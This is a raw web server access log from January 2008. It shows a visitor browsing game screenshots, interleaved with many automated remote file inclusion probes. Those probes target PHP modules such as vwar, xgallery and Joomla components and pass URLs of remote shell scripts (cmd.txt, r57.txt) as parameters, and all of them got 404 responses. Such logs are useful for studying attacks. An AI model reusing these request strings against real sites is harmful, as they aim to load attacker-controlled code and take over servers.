85.214.92.82 - - [06/Jan/2008:08:18:58 -0800] "GET /index.php?mnu=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:20:56 -0800] "GET /bikes/dteel HTTP/1.1" 301 96 "http://www.st-owners.com/forums/private.php?do=showpm&pmid=71111" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:20:56 -0800] "GET /bikes/dteel/ HTTP/1.1" 200 8265 "http://www.st-owners.com/forums/private.php?do=showpm&pmid=71111" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
209.168.245.227 - - [06/Jan/2008:08:21:21 -0800] "GET /logs/access_071205.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:21:47 -0800] "GET /bikes/dteel/EQ2/ HTTP/1.1" 200 696 "http://www.dmulk.com/bikes/dteel/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:21:50 -0800] "GET /bikes/dteel/EQ2/Screenshots/ HTTP/1.1" 200 7116 "http://www.dmulk.com/bikes/dteel/EQ2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
205.234.130.198 - - [06/Jan/2008:08:21:56 -0800] "GET /logs/access_071205.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:22:23 -0800] "GET /bikes/dteel/EQ2/ HTTP/1.1" 200 696 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:22:25 -0800] "GET /bikes/dteel/ HTTP/1.1" 200 8265 "http://www.dmulk.com/bikes/dteel/EQ2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:23:03 -0800] "GET /bikes/dteel/EQ2/ HTTP/1.1" 200 696 "http://www.dmulk.com/bikes/dteel/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:23:04 -0800] "GET /bikes/dteel/EQ2/Screenshots/ HTTP/1.1" 200 7116 "http://www.dmulk.com/bikes/dteel/EQ2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:23:10 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000004.jpg HTTP/1.1" 200 559417 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
65.38.105.213 - - [06/Jan/2008:08:23:39 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.96 - - [06/Jan/2008:08:23:49 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [06/Jan/2008:08:23:54 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [06/Jan/2008:08:24:15 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:25:15 -0800] "GET /bikes/dteel/EQ2/Screenshots/ HTTP/1.1" 200 7116 "http://www.dmulk.com/bikes/dteel/EQ2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:25:19 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000013.jpg HTTP/1.1" 200 562674 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:26:27 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000021.jpg HTTP/1.1" 200 651918 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
206.123.117.78 - - [06/Jan/2008:08:26:43 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://www.gcfps.org/bbs/skin/zero_vote/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.123.117.78 - - [06/Jan/2008:08:26:43 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=http://www.gcfps.org/bbs/skin/zero_vote/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.123.117.78 - - [06/Jan/2008:08:26:43 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.gcfps.org/bbs/skin/zero_vote/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.123.117.78 - - [06/Jan/2008:08:26:43 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.gcfps.org/bbs/skin/zero_vote/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.213 - - [06/Jan/2008:08:26:58 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.213 - - [06/Jan/2008:08:26:58 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.213 - - [06/Jan/2008:08:26:58 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:27:45 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000022.jpg HTTP/1.1" 200 507829 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
206.123.117.78 - - [06/Jan/2008:08:27:58 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gcfps.org/bbs/skin/zero_vote/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.123.117.78 - - [06/Jan/2008:08:27:58 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gcfps.org/bbs/skin/zero_vote/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.123.117.78 - - [06/Jan/2008:08:27:58 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gcfps.org/bbs/skin/zero_vote/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:28:36 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000025.jpg HTTP/1.1" 200 776473 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
65.38.105.213 - - [06/Jan/2008:08:28:54 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.213 - - [06/Jan/2008:08:28:54 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:29:43 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000042.jpg HTTP/1.1" 200 688311 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:29:53 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000046.jpg HTTP/1.1" 200 773445 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.4.196.37 - - [06/Jan/2008:08:29:57 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:30:39 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000049.jpg HTTP/1.1" 200 670839 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:30:46 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000051.jpg HTTP/1.1" 200 678929 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:30:52 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000086.jpg HTTP/1.1" 200 579533 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:31:00 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000094.jpg HTTP/1.1" 200 660073 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
65.38.105.213 - - [06/Jan/2008:08:31:05 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.213 - - [06/Jan/2008:08:31:05 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:31:43 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000102.jpg HTTP/1.1" 200 619032 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:31:51 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000136.jpg HTTP/1.1" 200 737141 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
209.168.245.227 - - [06/Jan/2008:08:32:39 -0800] "GET /logs/access_071220.log/modify.php?dir_module=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.168.245.227 - - [06/Jan/2008:08:32:40 -0800] "GET /modify.php?dir_module=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.168.245.227 - - [06/Jan/2008:08:32:40 -0800] "GET /logs/modify.php?dir_module=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [06/Jan/2008:08:32:40 -0800] "GET /logs/access_071220.log/modify.php?dir_module=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [06/Jan/2008:08:32:40 -0800] "GET /modify.php?dir_module=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [06/Jan/2008:08:32:40 -0800] "GET /logs/modify.php?dir_module=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:32:44 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000139.jpg HTTP/1.1" 200 674897 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:08:33:18 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:08:33:19 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:33:43 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000156.jpg HTTP/1.1" 200 721381 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:33:59 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000161.jpg HTTP/1.1" 200 754681 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:34:18 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000165.jpg HTTP/1.1" 200 832088 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
68.15.104.155 - - [06/Jan/2008:08:35:13 -0800] "GET /bughttp://222.122.158.214/bbs1/skin/log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
68.15.104.155 - - [06/Jan/2008:08:35:13 -0800] "GET /logs/bughttp://222.122.158.214/bbs1/skin/log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:35:19 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000170.jpg HTTP/1.1" 200 766667 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:36:07 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000185.jpg HTTP/1.1" 200 773497 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:37:26 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000187.jpg HTTP/1.1" 200 760935 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:38:15 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000188.jpg HTTP/1.1" 200 836334 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:38:52 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000191.jpg HTTP/1.1" 200 841391 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:39:02 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000193.jpg HTTP/1.1" 200 836136 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:39:41 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000207.jpg HTTP/1.1" 200 722685 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:40:39 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000210.jpg HTTP/1.1" 200 694218 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:40:45 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000211.jpg HTTP/1.1" 200 662658 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:40:54 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000214.jpg HTTP/1.1" 200 713890 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
74.6.29.37 - - [06/Jan/2008:08:41:35 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:42:01 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000220.jpg HTTP/1.1" 200 730624 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:42:14 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000224.jpg HTTP/1.1" 200 774954 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:43:12 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000225.jpg HTTP/1.1" 200 758217 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:43:40 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000229.jpg HTTP/1.1" 200 826013 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
208.110.73.18 - - [06/Jan/2008:08:46:36 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://vass0ra.110mb.com/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:47:00 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000233.jpg HTTP/1.1" 200 769073 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:08:47:18 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:08:47:19 -0800] "GET /megumi/Necklace/ HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:47:28 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000241.jpg HTTP/1.1" 200 766274 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:48:00 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000246.jpg HTTP/1.1" 200 746597 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:48:30 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000249.jpg HTTP/1.1" 200 728364 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:48:44 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000251.jpg HTTP/1.1" 200 762875 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
204.15.252.72 - - [06/Jan/2008:08:48:54 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.multiplan.pl/images/stories/appdata/groups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:49:10 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000253.jpg HTTP/1.1" 200 817672 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:49:37 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000264.jpg HTTP/1.1" 200 704661 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:50:09 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000266.jpg HTTP/1.1" 200 702115 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:50:16 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000270.jpg HTTP/1.1" 200 706210 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
207.58.187.94 - - [06/Jan/2008:08:50:36 -0800] "GET /config.php?path_to_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:50:48 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.1" 200 812848 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:51:20 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000290.jpg HTTP/1.1" 200 624383 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:51:35 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.1" 200 842640 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:52:07 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.1" 200 828304 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:52:38 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.1" 200 927196 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [06/Jan/2008:08:53:08 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.1" 200 913443 "http://www.dmulk.com/bikes/dteel/EQ2/Screenshots/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
